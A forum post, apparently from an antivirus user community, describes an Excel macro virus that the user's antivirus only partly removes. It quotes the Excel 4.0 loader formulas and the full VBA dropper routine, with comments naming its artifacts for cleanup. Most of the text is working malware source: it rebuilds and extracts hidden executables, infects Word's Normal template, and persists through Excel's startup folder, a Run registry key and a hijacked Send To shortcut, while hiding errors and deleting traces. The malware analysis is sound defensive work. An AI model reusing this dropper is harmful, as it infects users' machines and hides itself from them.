就目前我使用的情况来看,在打开带毒文件时,费尔只会提示某宏指令出错,然后要把OFFICE的宏功能关掉后才可正常显示。目前的状态是:只能防,但不会清除。
以下是具体情况:
对于中了宏病毒的EXCEL文件,会自动生成一个名为“(m1)_(m2)_(m3)”的隐藏工作表,如附图示。
图片见此链接:http://www.ftfans.org/attachment.php?aid=2255&k=aa521205db5126c2f178440809c43eab&t=1336461532&noupdate=yes
在OFFICE2003的版本中,无法有效禁用宏;只有升级到OFFICE2007才能稍微有效地防住。
但我更希望,费尔能查出这些病毒并清理。毕竟,OFFICE2007的普及度和向下兼容性都不太好。
当我打开EXCEL的宏功能后,再打开带病毒的文件时,费尔会提示有病毒,并清除。
但经过研究发现,此时费尔清除的只是该EXCEL表的宏所产生的病毒文件(存于C:\excel.txt),并未有效清理EXCEL中的宏命令。也就是说,被清除的只是中间产物,隐藏工作表里的宏仍然留在文件中,下次启用宏打开时还会重新生成该文件。
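以下是从病毒EXCEL文件中COPY出来的一段命令(Excel 4.0宏表公式)。从公式本身可以看出:它把C1:C88各单元格的内容逐行写入c:\excel.txt,再用VBA.INSERT.FILE把该文件作为VBA代码导入,最后运行其中的createcabfile过程。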
=FOPEN("c:\excel.txt",3)
=FOR.CELL("Counter",C1:C88,TRUE)
=FWRITELN($A$1,Counter)
=NEXT()
=FCLOSE($A$1)
=VBA.INSERT.FILE("c:\excel.txt")
=RUN("createcabfile",FALSE)
=RETURN()
-----------------------------------
同时,以上命令只是出现在A列,在B列还有很多16进制的代码。(HEX模式)
以下是C列的一些语句(从语法看是VBA代码,而不是汇编):
' createcabfile -- dropper routine recovered from the infected workbook.
' This is a malware sample quoted for analysis; the comments describe what
' each step does so that the artifacts can be detected and removed.
'
' Artifacts visible in this routine (useful as cleanup / detection checklist):
'   - hidden sheet "(m1)_(m2)_(m3)" whose column 2 carries the encoded payload
'   - staging files c:\excel.txt, c:\cab.cab, c:\normal.dot, c:\norma1.xlm, c:\internet.exe
'   - system+hidden files c:\setflag.exe and c:\sendto.exe
'   - norma1.xlm (digit "1", not letter "l") in Excel's startup path
'   - a "Software" subfolder under the user's Templates folder holding copies
'   - a replaced normal.dot in Word's NormalTemplate path
'   - internet.exe in the folder returned by GetSpecialFolder(1)
'   - HKCU ...\CurrentVersion\Run value "Internet.exe"
'   - a modified "Send To" shortcut pointing at c:\sendto.exe
Private Sub createcabfile()
Dim ch As Byte
' Every runtime error is swallowed, so failed steps never surface to the user.
on error resume next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
' Working/backup folder: <Templates>\Software\ ; created if missing.
myfolder = w.specialfolders("Templates") & "\Software\"
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
' Close any open workbook named "normal.xlm" and delete it from the Excel
' startup path. NOTE(review): presumably removes another/older variant -- not
' confirmable from this listing.
For i=1 to Workbooks.Count
If Workbooks(i).name="normal.xlm" then
workbooks(i).close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
' Infection marker check: if "norma1.xlm" is already open in this Excel
' session, skip installation and jump straight to the cleanup at label a1.
For i=1 to Workbooks.Count
If Workbooks(i).name="norma1.xlm" then
goto a1
End If
Next
cabfile= "c:\cab.cab"
' Install branch: runs only when norma1.xlm is not yet in the startup path.
If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
' NOTE(review): FileSystemObject exposes DeleteFile, not Delete, so this call
' most likely fails and is hidden by "on error resume next".
fso.delete cabfile
' Rebuild the cabinet file byte by byte from the hidden sheet: rows 1..150 of
' column 2 each hold space-separated byte values; every token that is followed
' by a space is converted with CByte and written to c:\cab.cab.
open cabfile for binary access write as #1
For i = 1 To 150
hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
n=1
m=instr(hv," ")
do while m>0
ch=CByte(mid(hv,n,m-n))
put #1,,ch
n=m+1
m=instr(n,hv," ")
loop
Next
close #1
' Clear the system/hidden attributes on earlier copies so extraction can
' overwrite them. All shell commands run with window style 0 (hidden) and wait.
w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
' Unpack the cabinet into c:\ ; both extrac32 and extract are tried so that
' whichever tool exists on the machine does the work.
w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
fso.deletefile cabfile
' Keep a copy of the dropped normal.dot in <Templates>\Software\.
fso.copyfile "c:\normal.dot", myfolder, True
' Start Word only to learn where its Normal template lives, then overwrite
' that template with the dropped normal.dot (spreads the infection to Word).
set word=createobject("word.application")
ntpath=word.NormalTemplate.Path & "\"
word.quit
fso.copyfile "c:\normal.dot", ntpath, True
' Excel persistence: files in Application.StartupPath are opened on every
' Excel start, so norma1.xlm loads automatically from now on.
fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
' GetSpecialFolder(1) is the Windows system folder.
fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
' Hijack the "Send To" entry whose name contains the Chinese word for floppy
' disk: its shortcut is rewritten to launch c:\sendto.exe with a shell32 icon.
set fold=fso.getfolder(w.SpecialFolders("SendTo"))
for each ff in fold.files
if instr(ff.name,"软盘")>0 then
set lnk=w.CreateShortcut(fold.path & "\" & ff.name)
lnk.TargetPath="c:\sendto.exe"
lnk.IconLocation="shell32.dll,6"
lnk.save
goto e2
end if
next
e2:
' Remove the staging copies from c:\ and re-hide the two executables left there.
fso.deletefile "c:\normal.dot"
fso.deletefile "c:\norma1.xlm"
fso.deletefile "c:\internet.exe"
w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
' Logon persistence: adds Run value "Internet.exe" = "internet.exe" for the
' current user and deletes the similarly named "Internat.exe" value.
w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"
w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
End If
' Refresh the startup workbook: copy this workbook's payload column into
' norma1.xlm, save it, and update the backup copy in <Templates>\Software\.
Workbooks.Open Application.StartupPath & "\norma1.xlm"
thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)
workbooks("norma1.xlm").save
fso.copyfile Application.StartupPath & "\norma1.xlm",myfolder,true
a1:
' Cover tracks: delete the c:\excel.txt staging file, then silently (alerts
' off) delete every sheet whose name starts with the Chinese word for
' "module sheet". NOTE(review): presumably the sheets created when the macro
' imported c:\excel.txt -- confirm against a sample.
fso.deletefile "c:\excel.txt"
Application.DisplayAlerts = False
for i=1 to thisworkbook.sheets.count
if left(thisworkbook.sheets(i).name,3)="模块表" then
ThisWorkbook.Sheets(i).Delete
end if
next
Application.DisplayAlerts = True
' Mark the workbook as unmodified so Excel shows no save prompt on close.
ThisWorkbook.Saved=True
End Sub